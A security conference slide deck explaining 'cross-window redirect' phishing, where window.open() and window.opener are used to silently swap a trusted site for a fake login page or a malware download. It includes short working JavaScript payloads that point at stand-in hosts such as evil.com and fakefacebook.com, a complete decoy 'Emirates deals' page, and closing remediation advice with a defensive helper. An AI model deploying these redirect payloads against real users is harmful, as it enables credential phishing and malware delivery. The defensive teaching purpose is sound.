Cross Window Redirect Khaled Hawasli Michael Hendrickx

The Cross Window redirect


Page 1: The Cross Window redirect

Cross Window Redirect

Khaled Hawasli
Michael Hendrickx

Page 2: The Cross Window redirect

Who are we?
• Khaled Hawasli
– Manager Security Analysis @ HelpAG
• Michael Hendrickx
– Security Analyst @ HelpAG

Page 3: The Cross Window redirect

Preface
• Social Engineering becomes more sophisticated
• People don't fall for the "click here" trick
– Receive email with link
– Click link
– Presented with login screen

Page 4: The Cross Window redirect

Old tricks
• www.facebook.com

Page 5: The Cross Window redirect

Cross-Window Redirect
• Exploiting opened windows using JS
• Hyperlink redirections the user does not notice
• Works on all browsers
• 2 Variants:
– Child window redirect
– Parent window redirect

Page 6: The Cross Window redirect

Child window redirect
• Control the link you just opened

Diagram:
1. Parent Window, the attacker's site (controlling window), opens Gmail with window.open()
2. Child Window, the targeted site (controlled window), is redirected to the fake phishing page

// parent page: open the legitimate site, keep the handle, then re-point it
var childWindow = window.open('https://mail.google.com');
childWindow.location = 'http://mail.google.com.evil.com/gmail/login.php';

Page 7: The Cross Window redirect

X-windows redirect demo
• Let's get malware to users
– Let's watch a movie
– We need a movie player

http://michaelhendrickx.com/misc/sf.html

Page 8: The Cross Window redirect

X-windows redirect explained
• Link to SF to download software
– Rewrite the link before the countdown

// parent page: open the SourceForge download page, then swap the child's
// location once the user expects the download to start
var sf = window.open('http://sourceforge.net/...');
setTimeout(function () {
  sf.location = 'http://evil.org/nmap.tar.gz';
}, 4000);

Page 9: The Cross Window redirect

Multiple ways to attack this:
• setTimeout():
– Wait for a while and redirect the page.
• Interactive:
– Server polling using XHR
– Attacker can flip page on demand
• HTML5 Visibility API:
– Flip page when user is not looking

https://github.com/ndrix/xwindow-redirect

Page 10: The Cross Window redirect

Parent Window Redirect
• "Evil child" can control the parent

Diagram:
1. Parent Window, the targeted site (controlled window), opens the attacker's website with window.open()
2. Child Window, the attacker site (controlling window), redirects the parent

// parent (targeted) page
window.open('http://mywebsite.com');

// child (attacker) page: redirect the window that opened it
window.opener.location = 'http://evil.com/gmail/login.php';

Page 11: The Cross Window redirect

Parent window redirect: demo
• Emirates has some crazy deals!
(Click Facebook message)

Page 12: The Cross Window redirect

Parent window redirect: demo
• Emirates has some crazy deals!

<!DOCTYPE html>
<html>
<head><title>Crazy deals from Emirates.com</title></head>
<body>
<img src="ek.jpg"/>
<script>
window.opener.location = 'http://fakefacebook.com';
window.location = 'http://www.emirates.com/ae/…';
</script>
</body>
</html>

Page 13: The Cross Window redirect

Parent window redirect: demo
• User may spend long enough on the target site, believing that Facebook timed out.

Parent Window / Child Window:
1. Parent opens child with window.open()
2. Child redirects Facebook (the parent) to fake "session logged out" page
3. Child refreshes itself to the legitimate site

Page 14: The Cross Window redirect

Other sites that use window.open()
• Facebook, Amazon widget, …
• GMail schema.org

Page 15: The Cross Window redirect

Remediation
• Don't use window.open() to open hyperlinks
– Those links may control your page
• Verify if your page was opened from another page
– if (window.opener && !window.opener.closed) { ... }
• Preferably, browsers should use X-Frame-Options header for these JS links
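Added defensive example, not from the slides: two helpers covering the remediation points above. Both take a window-like object `win` (an assumption made so the logic can be exercised in Node against a constructed stub; in a page, pass the real `window`).

```javascript
// Added defensive example, not from the slides. Both helpers take a
// window-like object `win` so the logic can run in Node against a
// constructed stub; in a real page, pass `window`.

// Defence against the parent-window variant: open a link without giving
// the new window a usable `opener`, and never keep a handle to it.
function openWithoutOpener(win, url) {
  // Refuse anything that is not http(s), e.g. javascript: or data: URLs.
  if (!/^https?:\/\//i.test(url)) {
    throw new Error('refusing to open non-http(s) URL: ' + url);
  }
  // With the 'noopener' feature the browser sets child.opener to null
  // and returns null instead of a window handle.
  const child = win.open(url, '_blank', 'noopener');
  // A browser that ignores 'noopener' still returns a handle: sever the
  // back reference ourselves so the child cannot reach window.opener.
  if (child) {
    child.opener = null;
  }
  return null; // never expose a handle that could later be re-pointed
}

// Detection for the child-window variant (the remediation slide's check):
// a live opener means another page still holds a handle to this window
// and can change its location at any time. Report it so the caller can,
// for example, refuse to show a login form in that state.
function auditOpener(win) {
  const openedByAnotherPage = Boolean(win.opener) && !win.opener.closed;
  if (openedByAnotherPage) {
    // Drop our reference to the parent so this page can no longer be
    // used to redirect it; the parent's handle to us is unaffected.
    win.opener = null;
  }
  return { openedByAnotherPage };
}

// Constructed stub standing in for a legacy browser window that ignores
// 'noopener' and hands back a child whose opener points at us.
const legacyWindow = {
  opener: { closed: false },
  open(url, name, features) { return { opener: legacyWindow, closed: false }; },
};
openWithoutOpener(legacyWindow, 'https://mail.google.com/');
console.log(auditOpener(legacyWindow)); // { openedByAnotherPage: true }
```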

Page 16: The Cross Window redirect

Thank you!

Any questions?